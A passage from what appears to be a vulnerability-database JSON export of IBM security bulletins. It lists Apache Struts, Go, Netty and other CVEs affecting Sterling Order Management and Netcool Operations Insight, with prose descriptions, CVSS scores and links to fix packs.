https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \nIBM Sterling Order Management| 9.5.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Sterling Order Management version 10 and if you are running IBM Sterling Order Management version 9.5 a product upgrade must be completed first. IBM Sterling Order Management version 9.5 end of support April 30, 2022.\n\nOrder Management installing Fix Pack29 -[https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29 https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp30](<https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version#fp29>)\n\nFix Pack 29 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&amp;product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&amp;source=dbluesearch&amp;mhsrc=ibmsearch_a&amp;mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&amp;function=fixId&amp;parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-SSFF-All-fp30-Installer&product=ibm%2FOther%20software%2FSterling%20Selling%20and%20Fulfillment%20Foundation&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling-SSFF-All-fp30-Installer%20&function=fixId&parent=ibm/Other%20software>)\n\nCreating &amp; Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\nOn-Premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&amp;fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&amp;source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by executing above steps in product version 10.0. Version 9.5 is end of support as of April 30, 2022. If you need further clarifications regarding 9.5 end of support, log4j and version 9.5 please contact IBM support.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:45:15", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management Apache Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:45:15", "id": "87B4000A01C23B6231C463A8E1B3BEC371361C202F46354684899DC113F12BC8", "href": "https://www.ibm.com/support/pages/node/6620355", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:54:13", "description": "## Summary\n\nNetcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities, listed in the CVEs below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23450](<https://vulners.com/cve/CVE-2021-23450>) \n** DESCRIPTION: **Dojo could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in the setObject function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216463](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216463>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-22144](<https://vulners.com/cve/CVE-2021-22144>) \n** DESCRIPTION: **Elasticsearch is vulnerable to a denial of service, caused by an uncontrolled recursion vulnerability in the Elasticsearch Grok parser. By creating a specially crafted Grok query, a remote authenticated attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206321](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206321>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double evaluation of tag attributes. By forcing OGNL evaluation of specially-crafted data using the %{...} syntax, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223990](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223990>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-14039](<https://vulners.com/cve/CVE-2020-14039>) \n** DESCRIPTION: **Go could allow a remote attacker to bypass security restrictions, caused by improper validation on the VerifyOptions.KeyUsages EKU requirements during the X.509 certificate verification. An attacker could exploit this vulnerability to gain access to the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/185443](<https://exchange.xforce.ibmcloud.com/vulnerabilities/185443>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2020-15586](<https://vulners.com/cve/CVE-2020-15586>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a data race in some net/http servers. By sending specially-crafted HTTP requests, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/185446](<https://exchange.xforce.ibmcloud.com/vulnerabilities/185446>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-16845](<https://vulners.com/cve/CVE-2020-16845>) \n** DESCRIPTION: **Go Language is vulnerable to a denial of service, caused by an infinite read loop in ReadUvarint and ReadVarint in encoding/binary. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186375](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186375>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-24553](<https://vulners.com/cve/CVE-2020-24553>) \n** DESCRIPTION: **Golang Go is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the CGI/FCGI handlers. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/187776](<https://exchange.xforce.ibmcloud.com/vulnerabilities/187776>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-28362](<https://vulners.com/cve/CVE-2020-28362>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by improper input validation by the math/big.Int methods. By sending a specially-crafted inputs, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191976](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191976>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-28366](<https://vulners.com/cve/CVE-2020-28366>) \n** DESCRIPTION: **Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by a code injection flaw in go command when cgo is in use in build time. By using a specially-crafted package, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191978](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191978>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-28367](<https://vulners.com/cve/CVE-2020-28367>) \n** DESCRIPTION: **Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by a argument injection flaw in go command when cgo is in use in build time. By using a specially-crafted package, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191979](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191979>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-7919](<https://vulners.com/cve/CVE-2020-7919>) \n** DESCRIPTION: **Go is vulnerable to a denial of service. By sending a malformed X.509 certificate, a remote attacker could exploit this vulnerability to cause a system panic. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/178227](<https://exchange.xforce.ibmcloud.com/vulnerabilities/178227>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-27918](<https://vulners.com/cve/CVE-2021-27918>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by an infinite loop flaw when using xml.NewTokenDecoder with a custom TokenReader. By persuading a victim to open a specially-crafted XML content, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198075](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198075>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-29923](<https://vulners.com/cve/CVE-2021-29923>) \n** DESCRIPTION: **Golang Go could allow a remote attacker to bypass security restrictions, caused by improper consideration for extraneous zero characters at the beginning of an IP address octet. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access control based on IP addresses. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/207025](<https://exchange.xforce.ibmcloud.com/vulnerabilities/207025>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2021-3114](<https://vulners.com/cve/CVE-2021-3114>) \n** DESCRIPTION: **An unspecified error with the P224() Curve implementation can generate incorrect outputs in Golang Go has an unknown impact and attack vector. \nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/195677](<https://exchange.xforce.ibmcloud.com/vulnerabilities/195677>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-31525](<https://vulners.com/cve/CVE-2021-31525>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw in net/http. By sending a specially-crafted header to ReadRequest or ReadResponse. Server, Transport, and Client, a remote attacker could exploit this vulnerability to cause a (panic) denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202709](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202709>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-33195](<https://vulners.com/cve/CVE-2021-33195>) \n** DESCRIPTION: **Golang Go could allow a remote attacker to execute arbitrary code on the system, caused by not following RFC 1035 rules in the LookupCNAME, LookupSRV, LookupMX, LookupNS, and LookupAddr functions in net. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206601](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206601>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-33196](<https://vulners.com/cve/CVE-2021-33196>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw in the NewReader and OpenReader functions in archive/zip. By persuading a victim to open a specially-crafted archive file, a remote attacker could exploit this vulnerability to cause a panic or an unrecoverable fatal error, and results in a denial of service condition. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206602](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206602>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-33197](<https://vulners.com/cve/CVE-2021-33197>) \n** DESCRIPTION: **Golang Go could allow a remote attacker to bypass security restrictions, caused by a flaw in the ReverseProxy in net/http/httputil. By sending a specially-crafted request, an attacker could exploit this vulnerability to drop arbitrary headers, including those set by the ReverseProxy.Director. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2021-33198](<https://vulners.com/cve/CVE-2021-33198>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw in the SetString and UnmarshalText methods of math/big.Rat. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause a panic or an unrecoverable fatal error, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/206604](<https://exchange.xforce.ibmcloud.com/vulnerabilities/206604>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-36221](<https://vulners.com/cve/CVE-2021-36221>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a race condition upon an ErrAbortHandler abort. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a net/http/httputil ReverseProxy panic. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/207036](<https://exchange.xforce.ibmcloud.com/vulnerabilities/207036>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-38297](<https://vulners.com/cve/CVE-2021-38297>) \n** DESCRIPTION: **Golang Go is vulnerable to a buffer overflow, caused by improper bounds checking when invoking functions from WASM modules. By passing very large arguments, a remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211507](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211507>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39293](<https://vulners.com/cve/CVE-2021-39293>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw in the NewReader and OpenReader functions in archive/zip. By sending a specially-crafted archive header, a remote attacker could exploit this vulnerability to cause a panic, which results in a denial of service. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/220196](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220196>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-41771](<https://vulners.com/cve/CVE-2021-41771>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by an out-of-bounds slice situation in the ImportedSymbols function in debug/macho. By using specially-crafted binaries, a remote attacker could exploit this vulnerability to cause a panic, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213016](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213016>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-41772](<https://vulners.com/cve/CVE-2021-41772>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by an out-of-bounds slice situation in the Reader.Open function. By using a specially-crafted ZIP archive containing an invalid name or an empty filename field, a remote attacker could exploit this vulnerability to cause a panic, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213019](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213019>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44716](<https://vulners.com/cve/CVE-2021-44716>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by an uncontrolled memory consumption in the header canonicalization cache in net/http. By sending HTTP/2 requests, a remote attacker could exploit this vulnerability to consume all available memory resources. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216553](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216553>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-23772](<https://vulners.com/cve/CVE-2022-23772>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a buffer overflow in the Rat.SetString function in math/big. By sending a specially-crafted request, an attacker could exploit this vulnerability to consume large amount of RAM and cause the application to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219442](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219442>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-23773](<https://vulners.com/cve/CVE-2022-23773>) \n** DESCRIPTION: **An unspecified error with not treating branches with semantic-version names as releases in cmd/go in Golang Go has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219443](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219443>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-23806](<https://vulners.com/cve/CVE-2022-23806>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw with IsOnCurve function returns true for invalid field elements. By sending a specially-crafted request, an attacker could exploit this vulnerability to causes a panic in ScalarMult, and results in a denial of condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219444](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219444>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-24675](<https://vulners.com/cve/CVE-2022-24675>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a stack-based buffer overflow in encoding/pem in the Decode feature. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause the program to crash. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224866](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224866>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-24921](<https://vulners.com/cve/CVE-2022-24921>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by improper input validation. By using a specially-crafted deeply nested expression, a remote attacker could exploit this vulnerability to cause a goroutine stack exhaustion, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/221503](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221503>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-28327](<https://vulners.com/cve/CVE-2022-28327>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by improper input validaiton by the generic P-256 feature in crypto/elliptic. By sending a specially-crafted request with long scalar input, a remote attacker could exploit this vulnerability to cause a panic on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224871](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224871>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92889](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-10086](<https://vulners.com/cve/CVE-2019-10086>) \n** DESCRIPTION: **Apache Commons Beanutils could allow a remote attacker to gain unauthorized access to the system, caused by the failure to suppresses the class property in bean introspection by default. An attacker could exploit this vulnerability to gain unauthorized access to the classloader. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/166353](<https://exchange.xforce.ibmcloud.com/vulnerabilities/166353>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2020-13956](<https://vulners.com/cve/CVE-2020-13956>) \n** DESCRIPTION: **Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of malformed authority component in request URIs. By passing request URIs to the library as java.net.URI object, an attacker could exploit this vulnerability to pick the wrong target host for request execution. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/189572](<https://exchange.xforce.ibmcloud.com/vulnerabilities/189572>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-29425](<https://vulners.com/cve/CVE-2021-29425>) \n** DESCRIPTION: **Apache Commons IO could allow a remote attacker to traverse directories on the system, caused by improper input validation by the FileNameUtils.normalize method. An attacker could send a specially-crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/199852](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199852>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2021-21409](<https://vulners.com/cve/CVE-2021-21409>) \n** DESCRIPTION: **Netty is vulnerable to request smuggling, caused by improper validation of request, caused by missing validation of content-length. By sending specially-crafted request, an attacker could exploit this vulnerability to poison a web-cache, perform an XSS attack, or obtain sensitive information from request. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/199150](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199150>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-21295](<https://vulners.com/cve/CVE-2021-21295>) \n** DESCRIPTION: **Netty is vulnerable to HTTP request smuggling, caused by improper validation of Content-Length header by the Http2MultiplexHandler. By sending specially crafted HTTP request headers, an attacker could exploit this vulnerability to poison a web-cache, perform an XSS attack, or obtain sensitive information from request. \nCVSS Base score: 6.5 \nCVSS 